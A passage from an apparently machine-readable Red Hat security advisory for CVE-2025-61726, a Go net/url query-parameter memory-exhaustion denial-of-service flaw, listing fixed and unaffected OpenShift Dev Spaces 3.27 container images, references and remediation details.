"Red Hat OpenShift Dev Spaces 3.27:registry.redhat.io/devspaces/pluginregistry-rhel9@sha256:de4737b85e6f485e6dc5283574f7da587995ef60a17039df4728c126df00b4e4_s390x",
"Red Hat OpenShift Dev Spaces 3.27:registry.redhat.io/devspaces/server-rhel9@sha256:4550375a1ce30dfa306ac819590e0f95f512a7f9036e756e0ed643297f7555fe_ppc64le",
"Red Hat OpenShift Dev Spaces 3.27:registry.redhat.io/devspaces/server-rhel9@sha256:62a2ad04b76186b8cc425a677aee50ed2e0cf531fc87888f513fe54d250510d3_s390x",
"Red Hat OpenShift Dev Spaces 3.27:registry.redhat.io/devspaces/server-rhel9@sha256:782ccfcc7d458e2b27f0146c39bcf43c3133197d62a97052a2b67da4000c0c47_amd64",
"Red Hat OpenShift Dev Spaces 3.27:registry.redhat.io/devspaces/server-rhel9@sha256:c51792428816b2744121027ff39c1f0d1368ad2812e5604f4aceefe85ee23f00_arm64"
]
}
],
"ids": [
{
"system_name": "Red Hat Bugzilla ID",
"text": "2434432"
}
],
"notes": [
{
"category": "description",
"text": "A flaw was found in the net/url package in the Go standard library. The package does not enforce a limit on the number of unique query parameters it parses. A Go application using the net/http.Request.ParseForm method will try to process all parameters provided in the request. A specially crafted HTTP request containing a massive number of query parameters will cause the application to consume an excessive amount of memory, eventually causing the application to crash or become unresponsive, resulting in a denial of service.",
"title": "Vulnerability description"
},
{
"category": "summary",
"text": "golang: net/url: Memory exhaustion in query parameter parsing in net/url",
"title": "Vulnerability summary"
},
{
"category": "other",
"text": "To exploit this flaw, an attacker must be able to send a specially crafted HTTP request to an application parsing URL-encoded forms with net/url, specifically a request containing a large number of unique query parameters. The request will cause the application to consume an excessive amount of memory and eventually result in a denial of service, with no impact to confidentiality or integrity. Due to this reason, this vulnerability has been rated with an important severity.",
"title": "Statement"
},
{
"category": "general",
"text": "The CVSS score(s) listed for this vulnerability do not reflect the associated product\u0027s status, and are included for informational purposes to better understand the severity of this vulnerability.",
"title": "CVSS score applicability"
}
],
"product_status": {
"fixed": [
"Red Hat OpenShift Dev Spaces 3.27:registry.redhat.io/devspaces/code-rhel9@sha256:1033ffe714e728e289eddaa3809e9d21915de193813339fa5c049373e3e78719_amd64",
"Red Hat OpenShift Dev Spaces 3.27:registry.redhat.io/devspaces/code-rhel9@sha256:1c026c9c6fa5b70e2ab18b79f7974fe811558a4fbb3efee8eac17a165af2d4a2_s390x",
"Red Hat OpenShift Dev Spaces 3.27:registry.redhat.io/devspaces/code-rhel9@sha256:650e9cec2b386064718aa87d794e3264eaf3af766060e4141f6f0870347cdb64_ppc64le",
"Red Hat OpenShift Dev Spaces 3.27:registry.redhat.io/devspaces/code-rhel9@sha256:cad5f1983385201427a94f980baeefece28aedc8089425db88806d54103dfe91_arm64",
"Red Hat OpenShift Dev Spaces 3.27:registry.redhat.io/devspaces/configbump-rhel9@sha256:81dc1398a2f94a040d43841f908c743f696ba9edfdd36ad47b225a90ef69da28_amd64",
"Red Hat OpenShift Dev Spaces 3.27:registry.redhat.io/devspaces/configbump-rhel9@sha256:87415e884ce4a792725ebef47c95e81a4c98b594a333f5c9852ce68c13d33c09_s390x",
"Red Hat OpenShift Dev Spaces 3.27:registry.redhat.io/devspaces/configbump-rhel9@sha256:acaa080820cc3886395466b4a327600752f13eb9e8728cece8bff696d92649e2_arm64",
"Red Hat OpenShift Dev Spaces 3.27:registry.redhat.io/devspaces/configbump-rhel9@sha256:d160df16f213208e22f67e0261fed70a5aa6eb64a79438c7affac0748d214e08_ppc64le",
"Red Hat OpenShift Dev Spaces 3.27:registry.redhat.io/devspaces/devspaces-rhel9-operator@sha256:5d1045ab74b00b9ac4888a7971adfddf03142cf73b80e427d2bdde17f8a33f7d_s390x",
"Red Hat OpenShift Dev Spaces 3.27:registry.redhat.io/devspaces/devspaces-rhel9-operator@sha256:6ca64429fd2b33806f766cb84e2392bf16e85a64adeb19f687fd2f5ba588a359_amd64",
"Red Hat OpenShift Dev Spaces 3.27:registry.redhat.io/devspaces/devspaces-rhel9-operator@sha256:b317d159f7de28b2424c0333f48574b4b6b4852405f82a0643c0f22ff37253c6_arm64",
"Red Hat OpenShift Dev Spaces 3.27:registry.redhat.io/devspaces/devspaces-rhel9-operator@sha256:b98b93207d245e32fca4182f7f8debd05b853082f79eb06d513fd25eb659ab7e_ppc64le",
"Red Hat OpenShift Dev Spaces 3.27:registry.redhat.io/devspaces/imagepuller-rhel9@sha256:0d44f88b37488308e5c166fbf61ef195e473949d4d8930742742d52da8bd1d09_amd64",
"Red Hat OpenShift Dev Spaces 3.27:registry.redhat.io/devspaces/imagepuller-rhel9@sha256:49848a9d6c888956fe17c0a7faa350b1b534aa7623c6368c45fa676ec603c9a9_s390x",
"Red Hat OpenShift Dev Spaces 3.27:registry.redhat.io/devspaces/imagepuller-rhel9@sha256:582e28a0f571b32aa45ffdde4369479efb0fa504f163caf738b2dea23ad017f0_ppc64le",
"Red Hat OpenShift Dev Spaces 3.27:registry.redhat.io/devspaces/imagepuller-rhel9@sha256:8487157abf1a0cb7fb35aafdf9f5c3f3b7b3c107c5583b5cb2ceb80aabaaba75_arm64",
"Red Hat OpenShift Dev Spaces 3.27:registry.redhat.io/devspaces/traefik-rhel9@sha256:12ae1997a6df944284ecfb3501138c25f1a39eba23b52685b48008174a6a363a_s390x",
"Red Hat OpenShift Dev Spaces 3.27:registry.redhat.io/devspaces/traefik-rhel9@sha256:3942aaa0d29412ca79a413216b27ac338af01b1db1e31c5bb023fd135094768b_amd64",
"Red Hat OpenShift Dev Spaces 3.27:registry.redhat.io/devspaces/traefik-rhel9@sha256:b5f40cea19df512eb3083c9ec8a34b964742c44c4843ec979d0a4ff9e94ca02d_arm64",
"Red Hat OpenShift Dev Spaces 3.27:registry.redhat.io/devspaces/traefik-rhel9@sha256:e9a1f79f64b9427d4fa657f197d8e114f66ec6dfc028b8d4e47478d8f0d56d98_ppc64le",
"Red Hat OpenShift Dev Spaces 3.27:registry.redhat.io/devspaces/udi-base-rhel10@sha256:113200dd0b705840cbfd2128236c4ab3813e0146a45538f8d348517045004b10_s390x",
"Red Hat OpenShift Dev Spaces 3.27:registry.redhat.io/devspaces/udi-base-rhel10@sha256:84050974bd849ca3380327c00ae001980b9fee834bf44e080c90442be4b17682_arm64",
"Red Hat OpenShift Dev Spaces 3.27:registry.redhat.io/devspaces/udi-base-rhel10@sha256:db2b024c908f9e92b63b05e5de9c4a97d8258604e538e9b30261768f415a8213_ppc64le",
"Red Hat OpenShift Dev Spaces 3.27:registry.redhat.io/devspaces/udi-base-rhel10@sha256:e5209000fd966c4e98fa6609f998fe0d6edc3088aeaa68f1261865c168379df7_amd64",
"Red Hat OpenShift Dev Spaces 3.27:registry.redhat.io/devspaces/udi-base-rhel9@sha256:3e42db39ee6eff785c8e03e6a4f764ea5359221c2c9ecd153caee01a780d029b_ppc64le",
"Red Hat OpenShift Dev Spaces 3.27:registry.redhat.io/devspaces/udi-base-rhel9@sha256:5ecda2244caefbd85bd89bf7f8caeeeb511e91f87a6d46d83d7553901459715a_arm64",
"Red Hat OpenShift Dev Spaces 3.27:registry.redhat.io/devspaces/udi-base-rhel9@sha256:df538d83965fbf69f86fda16c699ee043ecbdb6b2a6b93ac9ef63e73d564537e_s390x",
"Red Hat OpenShift Dev Spaces 3.27:registry.redhat.io/devspaces/udi-base-rhel9@sha256:e095dd0cb8e327d8d6589bba674372aeb38397b22790bfed208156d3bb9d746c_amd64",
"Red Hat OpenShift Dev Spaces 3.27:registry.redhat.io/devspaces/udi-rhel9@sha256:58111d940c17ffcef32fc2d86f19c8d0f629b89c6412fb9933ca1ad411eec48f_s390x",
"Red Hat OpenShift Dev Spaces 3.27:registry.redhat.io/devspaces/udi-rhel9@sha256:8a97ad4c50e74468ffddb50f6dc3a748bd6223ca6dd869159eaa19447e8d5735_arm64",
"Red Hat OpenShift Dev Spaces 3.27:registry.redhat.io/devspaces/udi-rhel9@sha256:cef073ba3e67731d90b615b1ed97e8d8941f4b84f795feebaa14cbba4506c22a_amd64",
"Red Hat OpenShift Dev Spaces 3.27:registry.redhat.io/devspaces/udi-rhel9@sha256:f6eb04566e390bab2a8028146d0c54ffb3357cde8a633edd4e19ab29629acec4_ppc64le"
],
"known_not_affected": [
"Red Hat OpenShift Dev Spaces 3.27:registry.redhat.io/devspaces/code-sshd-rhel9@sha256:6446db0167fbd287557bb29b9f090da15b1b0846c62df9fd96cafd0784d4769d_arm64",
"Red Hat OpenShift Dev Spaces 3.27:registry.redhat.io/devspaces/code-sshd-rhel9@sha256:ca2b5dd80258f6d5105df99a2a4160086248ede21fd4fdb7be7d9d0e1768ec99_ppc64le",
"Red Hat OpenShift Dev Spaces 3.27:registry.redhat.io/devspaces/code-sshd-rhel9@sha256:d0e058ad62081efbb2d62a979d3d52443a19d361e2bec3d1bb1a6d403c4fa336_s390x",
"Red Hat OpenShift Dev Spaces 3.27:registry.redhat.io/devspaces/code-sshd-rhel9@sha256:ed1952126d5efdfe97f1d5411b7f057631bbae1b9c748c5f45746b6ee145fcad_amd64",
"Red Hat OpenShift Dev Spaces 3.27:registry.redhat.io/devspaces/dashboard-rhel9@sha256:272a65ee82a9484e1d4362a9f33b6cc1b0eb13d93e70b19cc3d0208f021c2bda_arm64",
"Red Hat OpenShift Dev Spaces 3.27:registry.redhat.io/devspaces/dashboard-rhel9@sha256:2bc4515148a52d94e1fcaf8991ddf0e9e98f0565bdae0f7f6c732feac0540d95_s390x",
"Red Hat OpenShift Dev Spaces 3.27:registry.redhat.io/devspaces/dashboard-rhel9@sha256:e139d927ef936bfabf780286ec4b4bf97e318db69c1af5b7473dd33ae54931b4_amd64",
"Red Hat OpenShift Dev Spaces 3.27:registry.redhat.io/devspaces/dashboard-rhel9@sha256:ff64d5d47c91c59904cb2a90eb9e42e563fea560407fa6c0590b964ace2ce469_ppc64le",
"Red Hat OpenShift Dev Spaces 3.27:registry.redhat.io/devspaces/devspaces-operator-bundle@sha256:d25e5effc8f3e6f0a02f3f1795cb83b585508b79e236b66e9a67be1511593864_amd64",
"Red Hat OpenShift Dev Spaces 3.27:registry.redhat.io/devspaces/jetbrains-ide-rhel9@sha256:0504f72e32867f2e16ae91237e494ad597897d234da6c772deedeec03c77f7da_arm64",
"Red Hat OpenShift Dev Spaces 3.27:registry.redhat.io/devspaces/jetbrains-ide-rhel9@sha256:2c0bfdd79524706c055e32bc68b3e099beea3f19e89184e763912b964588ca7e_ppc64le",
"Red Hat OpenShift Dev Spaces 3.27:registry.redhat.io/devspaces/jetbrains-ide-rhel9@sha256:4eb8ed347e951e036b5e464891ad26775288421b5ad4279e0a0a6a7682ed614a_s390x",
"Red Hat OpenShift Dev Spaces 3.27:registry.redhat.io/devspaces/jetbrains-ide-rhel9@sha256:ed6c681b49c827af9faad6364a9a5fff068253878597f4e2768f51e2debedabf_amd64",
"Red Hat OpenShift Dev Spaces 3.27:registry.redhat.io/devspaces/multicluster-redirector-rhel9@sha256:70d9bf5801e6c359fa2853ecb7b2c1156bc8d05c64ff9089b4266ca7d1c96bdc_ppc64le",
"Red Hat OpenShift Dev Spaces 3.27:registry.redhat.io/devspaces/multicluster-redirector-rhel9@sha256:b260051bc38be6e1edfbb536b3d5568408406bd5ba214d9c460ff31fda95080d_s390x",
"Red Hat OpenShift Dev Spaces 3.27:registry.redhat.io/devspaces/multicluster-redirector-rhel9@sha256:c82b5be3ccc18dfc9f64732e2a6892e40555556119e041445867ee6895698fff_arm64",
"Red Hat OpenShift Dev Spaces 3.27:registry.redhat.io/devspaces/multicluster-redirector-rhel9@sha256:ef4cdde7f946cb4ac076651227c139ec1151fe1dfcfab16a7370eb5a1dedf8f8_amd64",
"Red Hat OpenShift Dev Spaces 3.27:registry.redhat.io/devspaces/openvsx-rhel9@sha256:49ec7497195cc73b5ab71a31d84f4adba1068580f1b615a4918a6b9a614b8e1b_amd64",
"Red Hat OpenShift Dev Spaces 3.27:registry.redhat.io/devspaces/openvsx-rhel9@sha256:4a19870c5fa8b55441ce9de937de2023de89ec98415b70c8cdb868e541f7fe90_s390x",
"Red Hat OpenShift Dev Spaces 3.27:registry.redhat.io/devspaces/openvsx-rhel9@sha256:aae678397f22a53d10863aad458ea58d487b4ff87cd1a5200a02835fc2d76eb4_arm64",
"Red Hat OpenShift Dev Spaces 3.27:registry.redhat.io/devspaces/openvsx-rhel9@sha256:b47ea1f8c8cc35c7171251b9c044c38c7f66200e4336067c528b308f3a1779ec_ppc64le",
"Red Hat OpenShift Dev Spaces 3.27:registry.redhat.io/devspaces/pluginregistry-rhel9@sha256:31bed0f8d7cc026fb582a447d3cea648b6723b5309b282899062fb51a9b6b06b_arm64",
"Red Hat OpenShift Dev Spaces 3.27:registry.redhat.io/devspaces/pluginregistry-rhel9@sha256:b6c81d692c2610b97c365ba0160bd4d4f3222b3b8129f46e9bb4f744d91ca142_amd64",
"Red Hat OpenShift Dev Spaces 3.27:registry.redhat.io/devspaces/pluginregistry-rhel9@sha256:ddbef65f258899cb9450a370e72a61acb6e3710f4fe76cd1d43d5b68d661f4cb_ppc64le",
"Red Hat OpenShift Dev Spaces 3.27:registry.redhat.io/devspaces/pluginregistry-rhel9@sha256:de4737b85e6f485e6dc5283574f7da587995ef60a17039df4728c126df00b4e4_s390x",
"Red Hat OpenShift Dev Spaces 3.27:registry.redhat.io/devspaces/server-rhel9@sha256:4550375a1ce30dfa306ac819590e0f95f512a7f9036e756e0ed643297f7555fe_ppc64le",
"Red Hat OpenShift Dev Spaces 3.27:registry.redhat.io/devspaces/server-rhel9@sha256:62a2ad04b76186b8cc425a677aee50ed2e0cf531fc87888f513fe54d250510d3_s390x",
"Red Hat OpenShift Dev Spaces 3.27:registry.redhat.io/devspaces/server-rhel9@sha256:782ccfcc7d458e2b27f0146c39bcf43c3133197d62a97052a2b67da4000c0c47_amd64",
"Red Hat OpenShift Dev Spaces 3.27:registry.redhat.io/devspaces/server-rhel9@sha256:c51792428816b2744121027ff39c1f0d1368ad2812e5604f4aceefe85ee23f00_arm64"
]
},
"references": [
{
"category": "self",
"summary": "Canonical URL",
"url": "https://access.redhat.com/security/cve/CVE-2025-61726"
},
{
"category": "external",
"summary": "RHBZ#2434432",
"url": "https://bugzilla.redhat.com/show_bug.cgi?id=2434432"
},
{
"category": "external",
"summary": "https://www.cve.org/CVERecord?id=CVE-2025-61726",
"url": "https://www.cve.org/CVERecord?id=CVE-2025-61726"
},
{
"category": "external",
"summary": "https://nvd.nist.gov/vuln/detail/CVE-2025-61726",
"url": "https://nvd.nist.gov/vuln/detail/CVE-2025-61726"
},
{
"category": "external",
"summary": "https://go.dev/cl/736712",
"url": "https://go.dev/cl/736712"
},
{
"category": "external",
"summary": "https://go.dev/issue/77101",
"url": "https://go.dev/issue/77101"
},
{
"category": "external",
"summary": "https://groups.google.com/g/golang-announce/c/Vd2tYVM8eUc",
"url": "https://groups.google.com/g/golang-announce/c/Vd2tYVM8eUc"
},
{
"category": "external",
"summary": "https://pkg.go.dev/vuln/GO-2026-4341",
"url": "https://pkg.go.dev/vuln/GO-2026-4341"
}
],
"release_date": "2026-01-28T19:30:31.215000+00:00",
"remediations": [
{
"category": "vendor_fix",
"date": "2026-03-30T15:41:48+00:00",
"details": "Before applying this update, make sure all previously released errata relevant to your system have been applied.\nFor details on how to apply this update, refer to:\nhttps://access.redhat.com/articles/11258",
"product_ids": [
"Red Hat OpenShift Dev Spaces 3.27:registry.redhat.io/devspaces/code-rhel9@sha256:1033ffe714e728e289eddaa3809e9d21915de193813339fa5c049373e3e78719_amd64",
"Red Hat OpenShift Dev Spaces 3.27:registry.redhat.io/devspaces/code-rhel9@sha256:1c026c9c6fa5b70e2ab18b79f7974fe811558a4fbb3efee8eac17a165af2d4a2_s390x",
"Red Hat OpenShift Dev Spaces 3.27:registry.redhat.io/devspaces/code-rhel9@sha256:650e9cec2b386064718aa87d794e3264eaf3af766060e4141f6f0870347cdb64_ppc64le",
"Red Hat OpenShift Dev Spaces 3.27:registry.redhat.io/devspaces/code-rhel9@sha256:cad5f1983385201427a94f980baeefece28aedc8089425db88806d54103dfe91_arm64",
"Red Hat OpenShift Dev Spaces 3.27:registry.redhat.io/devspaces/configbump-rhel9@sha256:81dc1398a2f94a040d43841f908c743f696ba9edfdd36ad47b225a90ef69da28_amd64",
"Red Hat OpenShift Dev Spaces 3.27:registry.redhat.io/devspaces/configbump-rhel9@sha256:87415e884ce4a792725ebef47c95e81a4c98b594a333f5c9852ce68c13d33c09_s390x",
"Red Hat OpenShift Dev Spaces 3.27:registry.redhat.io/devspaces/configbump-rhel9@sha256:acaa080820cc3886395466b4a327600752f13eb9e8728cece8bff696d92649e2_arm64",
"Red Hat OpenShift Dev Spaces 3.27:registry.redhat.io/devspaces/configbump-rhel9@sha256:d160df16f213208e22f67e0261fed70a5aa6eb64a79438c7affac0748d214e08_ppc64le",
"Red Hat OpenShift Dev Spaces 3.27:registry.redhat.io/devspaces/devspaces-rhel9-operator@sha256:5d1045ab74b00b9ac4888a7971adfddf03142cf73b80e427d2bdde17f8a33f7d_s390x",
"Red Hat OpenShift Dev Spaces 3.27:registry.redhat.io/devspaces/devspaces-rhel9-operator@sha256:6ca64429fd2b33806f766cb84e2392bf16e85a64adeb19f687fd2f5ba588a359_amd64",
"Red Hat OpenShift Dev Spaces 3.27:registry.redhat.io/devspaces/devspaces-rhel9-operator@sha256:b317d159f7de28b2424c0333f48574b4b6b4852405f82a0643c0f22ff37253c6_arm64",
"Red Hat OpenShift Dev Spaces 3.27:registry.redhat.io/devspaces/devspaces-rhel9-operator@sha256:b98b93207d245e32fca4182f7f8debd05b853082f79eb06d513fd25eb659ab7e_ppc64le",
"Red Hat OpenShift Dev Spaces 3.27:registry.redhat.io/devspaces/imagepuller-rhel9@sha256:0d44f88b37488308e5c166fbf61ef195e473949d4d8930742742d52da8bd1d09_amd64",
"Red Hat OpenShift Dev Spaces 3.27:registry.redhat.io/devspaces/imagepuller-rhel9@sha256:49848a9d6c888956fe17c0a7faa350b1b534aa7623c6368c45fa676ec603c9a9_s390x",
"Red Hat OpenShift Dev Spaces 3.27:registry.redhat.io/devspaces/imagepuller-rhel9@sha256:582e28a0f571b32aa45ffdde4369479efb0fa504f163caf738b2dea23ad017f0_ppc64le",
"Red Hat OpenShift Dev Spaces 3.27:registry.redhat.io/devspaces/imagepuller-rhel9@sha256:8487157abf1a0cb7fb35aafdf9f5c3f3b7b3c107c5583b5cb2ceb80aabaaba75_arm64",
"Red Hat OpenShift Dev Spaces 3.27:registry.redhat.io/devspaces/traefik-rhel9@sha256:12ae1997a6df944284ecfb3501138c25f1a39eba23b52685b48008174a6a363a_s390x",
"Red Hat OpenShift Dev Spaces 3.27:registry.redhat.io/devspaces/traefik-rhel9@sha256:3942aaa0d29412ca79a413216b27ac338af01b1db1e31c5bb023fd135094768b_amd64",
"Red Hat OpenShift Dev Spaces 3.27:registry.redhat.io/devspaces/traefik-rhel9@sha256:b5f40cea19df512eb3083c9ec8a34b964742c44c4843ec979d0a4ff9e94ca02d_arm64",
"Red Hat OpenShift Dev Spaces 3.27:registry.redhat.io/devspaces/traefik-rhel9@sha256:e9a1f79f64b9427d4fa657f197d8e114f66ec6dfc028b8d4e47478d8f0d56d98_ppc64le",
"Red Hat OpenShift Dev Spaces 3.27:registry.redhat.io/devspaces/udi-base-rhel10@sha256:113200dd0b705840cbfd2128236c4ab3813e0146a45538f8d348517045004b10_s390x",
"Red Hat OpenShift Dev Spaces 3.27:registry.redhat.io/devspaces/udi-base-rhel10@sha256:84050974bd849ca3380327c00ae001980b9fee834bf44e080c90442be4b17682_arm64",
"Red Hat OpenShift Dev Spaces 3.27:registry.redhat.io/devspaces/udi-base-rhel10@sha256:db2b024c908f9e92b63b05e5de9c4a97d8258604e538e9b30261768f415a8213_ppc64le",
"Red Hat OpenShift Dev Spaces 3.27:registry.redhat.io/devspaces/udi-base-rhel10@sha256:e5209000fd966c4e98fa6609f998fe0d6edc3088aeaa68f1261865c168379df7_amd64",
"Red Hat OpenShift Dev Spaces 3.27:registry.redhat.io/devspaces/udi-base-rhel9@sha256:3e42db39ee6eff785c8e03e6a4f764ea5359221c2c9ecd153caee01a780d029b_ppc64le",
"Red Hat OpenShift Dev Spaces 3.27:registry.redhat.io/devspaces/udi-base-rhel9@sha256:5ecda2244caefbd85bd89bf7f8caeeeb511e91f87a6d46d83d7553901459715a_arm64",
"Red Hat OpenShift Dev Spaces 3.27:registry.redhat.io/devspaces/udi-base-rhel9@sha256:df538d83965fbf69f86fda16c699ee043ecbdb6b2a6b93ac9ef63e73d564537e_s390x",
"Red Hat OpenShift Dev Spaces 3.27:registry.redhat.io/devspaces/udi-base-rhel9@sha256:e095dd0cb8e327d8d6589bba674372aeb38397b22790bfed208156d3bb9d746c_amd64",
"Red Hat OpenShift Dev Spaces 3.27:registry.redhat.io/devspaces/udi-rhel9@sha256:58111d940c17ffcef32fc2d86f19c8d0f629b89c6412fb9933ca1ad411eec48f_s390x",
"Red Hat OpenShift Dev Spaces 3.27:registry.redhat.io/devspaces/udi-rhel9@sha256:8a97ad4c50e74468ffddb50f6dc3a748bd6223ca6dd869159eaa19447e8d5735_arm64",
"Red Hat OpenShift Dev Spaces 3.27:registry.redhat.io/devspaces/udi-rhel9@sha256:cef073ba3e67731d90b615b1ed97e8d8941f4b84f795feebaa14cbba4506c22a_amd64",
"Red Hat OpenShift Dev Spaces 3.27:registry.redhat.io/devspaces/udi-rhel9@sha256:f6eb04566e390bab2a8028146d0c54ffb3357cde8a633edd4e19ab29629acec4_ppc64le"
],
"restart_required": {
"category": "none"
},
"url": "https://access.redhat.com/errata/RHSA-2026:6192"
},
{
"category": "workaround",
"details": "Red Hat has investigated whether a possible mitigation exists for this issue, and has not been able to identify a practical example. Please update the affected package as soon as possible.",
"product_ids": [
"Red Hat OpenShift Dev Spaces 3.27:registry.redhat.io/devspaces/code-rhel9@sha256:1033ffe714e728e289eddaa3809e9d21915de193813339fa5c049373e3e78719_amd64",
"Red Hat OpenShift Dev Spaces 3.27:registry.redhat.io/devspaces/code-rhel9@sha256:1c026c9c6fa5b70e2ab18b79f7974fe811558a4fbb3efee8eac17a165af2d4a2_s390x",
"Red Hat OpenShift Dev Spaces 3.27:registry.redhat.io/devspaces/code-rhel9@sha256:650e9cec2b386064718aa87d794e3264eaf3af766060e4141f6f0870347cdb64_ppc64le",
"Red Hat OpenShift Dev Spaces 3.27:registry.redhat.io/devspaces/code-rhel9@sha256:cad5f1983385201427a94f980baeefece28aedc8089425db88806d54103dfe91_arm64",
"Red Hat OpenShift Dev Spaces 3.27:registry.redhat.io/devspaces/code-sshd-rhel9@sha256:6446db0167fbd287557bb29b9f090da15b1b0846c62df9fd96cafd0784d4769d_arm64",
"Red Hat OpenShift Dev Spaces 3.27:registry.redhat.io/devspaces/code-sshd-rhel9@sha256:ca2b5dd80258f6d5105df99a2a4160086248ede21fd4fdb7be7d9d0e1768ec99_ppc64le",
"Red Hat OpenShift Dev Spaces 3.27:registry.redhat.io/devspaces/code-sshd-rhel9@sha256:d0e058ad62081efbb2d62a979d3d52443a19d361e2bec3d1bb1a6d403c4fa336_s390x",
"Red Hat OpenShift Dev Spaces 3.27:registry.redhat.io/devspaces/code-sshd-rhel9@sha256:ed1952126d5efdfe97f1d5411b7f057631bbae1b9c748c5f45746b6ee145fcad_amd64",
"Red Hat OpenShift Dev Spaces 3.27:registry.redhat.io/devspaces/configbump-rhel9@sha256:81dc1398a2f94a040d43841f908c743f696ba9edfdd36ad47b225a90ef69da28_amd64",
"Red Hat OpenShift Dev Spaces 3.27:registry.redhat.io/devspaces/configbump-rhel9@sha256:87415e884ce4a792725ebef47c95e81a4c98b594a333f5c9852ce68c13d33c09_s390x",
"Red Hat OpenShift Dev Spaces 3.27:registry.redhat.io/devspaces/configbump-rhel9@sha256:acaa080820cc3886395466b4a327600752f13eb9e8728cece8bff696d92649e2_arm64",
"Red Hat OpenShift Dev Spaces 3.27:registry.redhat.io/devspaces/configbump-rhel9@sha256:d160df16f213208e22f67e0261fed70a5aa6eb64a79438c7affac0748d214e08_ppc64le",
"Red Hat OpenShift Dev Spaces 3.27:registry.redhat.io/devspaces/dashboard-rhel9@sha256:272a65ee82a9484e1d4362a9f33b6cc1b0eb13d93e70b19cc3d0208f021c2bda_arm64",
"Red Hat OpenShift Dev Spaces 3.27:registry.redhat.io/devspaces/dashboard-rhel9@sha256:2bc4515148a52d94e1fcaf8991ddf0e9e98f0565bdae0f7f6c732feac0540d95_s390x",
"Red Hat OpenShift Dev Spaces 3.27:registry.redhat.io/devspaces/dashboard-rhel9@sha256:e139d927ef936bfabf780286ec4b4bf97e318db69c1af5b7473dd33ae54931b4_amd64",
"Red Hat OpenShift Dev Spaces 3.27:registry.redhat.io/devspaces/dashboard-rhel9@sha256:ff64d5d47c91c59904cb2a90eb9e42e563fea560407fa6c0590b964ace2ce469_ppc64le",
"Red Hat OpenShift Dev Spaces 3.27:registry.redhat.io/devspaces/devspaces-operator-bundle@sha256:d25e5effc8f3e6f0a02f3f1795cb83b585508b79e236b66e9a67be1511593864_amd64",
"Red Hat OpenShift Dev Spaces 3.27:registry.redhat.io/devspaces/devspaces-rhel9-operator@sha256:5d1045ab74b00b9ac4888a7971adfddf03142cf73b80e427d2bdde17f8a33f7d_s390x",
"Red Hat OpenShift Dev Spaces 3.27:registry.redhat.io/devspaces/devspaces-rhel9-operator@sha256:6ca64429fd2b33806f766cb84e2392bf16e85a64adeb19f687fd2f5ba588a359_amd64",
"Red Hat OpenShift Dev Spaces 3.27:registry.redhat.io/devspaces/devspaces-rhel9-operator@sha256:b317d159f7de28b2424c0333f48574b4b6b4852405f82a0643c0f22ff37253c6_arm64",
"Red Hat OpenShift Dev Spaces 3.27:registry.redhat.io/devspaces/devspaces-rhel9-operator@sha256:b98b93207d245e32fca4182f7f8debd05b853082f79eb06d513fd25eb659ab7e_ppc64le",
"Red Hat OpenShift Dev Spaces 3.27:registry.redhat.io/devspaces/imagepuller-rhel9@sha256:0d44f88b37488308e5c166fbf61ef195e473949d4d8930742742d52da8bd1d09_amd64",
"Red Hat OpenShift Dev Spaces 3.27:registry.redhat.io/devspaces/imagepuller-rhel9@sha256:49848a9d6c888956fe17c0a7faa350b1b534aa7623c6368c45fa676ec603c9a9_s390x",
"Red Hat OpenShift Dev Spaces 3.27:registry.redhat.io/devspaces/imagepuller-rhel9@sha256:582e28a0f571b32aa45ffdde4369479efb0fa504f163caf738b2dea23ad017f0_ppc64le",
"Red Hat OpenShift Dev Spaces 3.27:registry.redhat.io/devspaces/imagepuller-rhel9@sha256:8487157abf1a0cb7fb35aafdf9f5c3f3b7b3c107c5583b5cb2ceb80aabaaba75_arm64",
"Red Hat OpenShift Dev Spaces 3.27:registry.redhat.io/devspaces/jetbrains-ide-rhel9@sha256:0504f72e32867f2e16ae91237e494ad597897d234da6c772deedeec03c77f7da_arm64",
"Red Hat OpenShift Dev Spaces 3.27:registry.redhat.io/devspaces/jetbrains-ide-rhel9@sha256:2c0bfdd79524706c055e32bc68b3e099beea3f19e89184e763912b964588ca7e_ppc64le",
"Red Hat OpenShift Dev Spaces 3.27:registry.redhat.io/devspaces/jetbrains-ide-rhel9@sha256:4eb8ed347e951e036b5e464891ad26775288421b5ad4279e0a0a6a7682ed614a_s390x",
"Red Hat OpenShift Dev Spaces 3.27:registry.redhat.io/devspaces/jetbrains-ide-rhel9@sha256:ed6c681b49c827af9faad6364a9a5fff068253878597f4e2768f51e2debedabf_amd64",
"Red Hat OpenShift Dev Spaces 3.27:registry.redhat.io/devspaces/multicluster-redirector-rhel9@sha256:70d9bf5801e6c359fa2853ecb7b2c1156bc8d05c64ff9089b4266ca7d1c96bdc_ppc64le",
"Red Hat OpenShift Dev Spaces 3.27:registry.redhat.io/devspaces/multicluster-redirector-rhel9@sha256:b260051bc38be6e1edfbb536b3d5568408406bd5ba214d9c460ff31fda95080d_s390x",
"Red Hat OpenShift Dev Spaces 3.27:registry.redhat.io/devspaces/multicluster-redirector-rhel9@sha256:c82b5be3ccc18dfc9f64732e2a6892e40555556119e041445867ee6895698fff_arm64",
"Red Hat OpenShift Dev Spaces 3.27:registry.redhat.io/devspaces/multicluster-redirector-rhel9@sha256:ef4cdde7f946cb4ac076651227c139ec1151fe1dfcfab16a7370eb5a1dedf8f8_amd64",
"Red Hat OpenShift Dev Spaces 3.27:registry.redhat.io/devspaces/openvsx-rhel9@sha256:49ec7497195cc73b5ab71a31d84f4adba1068580f1b615a4918a6b9a614b8e1b_amd64",
"Red Hat OpenShift Dev Spaces 3.27:registry.redhat.io/devspaces/openvsx-rhel9@sha256:4a19870c5fa8b55441ce9de937de2023de89ec98415b70c8cdb868e541f7fe90_s390x",
"Red Hat OpenShift Dev Spaces 3.27:registry.redhat.io/devspaces/openvsx-rhel9@sha256:aae678397f22a53d10863aad458ea58d487b4ff87cd1a5200a02835fc2d76eb4_arm64",
"Red Hat OpenShift Dev Spaces 3.27:registry.redhat.io/devspaces/openvsx-rhel9@sha256:b47ea1f8c8cc35c7171251b9c044c38c7f66200e4336067c528b308f3a1779ec_ppc64le",
"Red Hat OpenShift Dev Spaces 3.27:registry.redhat.io/devspaces/pluginregistry-rhel9@sha256:31bed0f8d7cc026fb582a447d3cea648b6723b5309b282899062fb51a9b6b06b_arm64",
"Red Hat OpenShift Dev Spaces 3.27:registry.redhat.io/devspaces/pluginregistry-rhel9@sha256:b6c81d692c2610b97c365ba0160bd4d4f3222b3b8129f46e9bb4f744d91ca142_amd64",
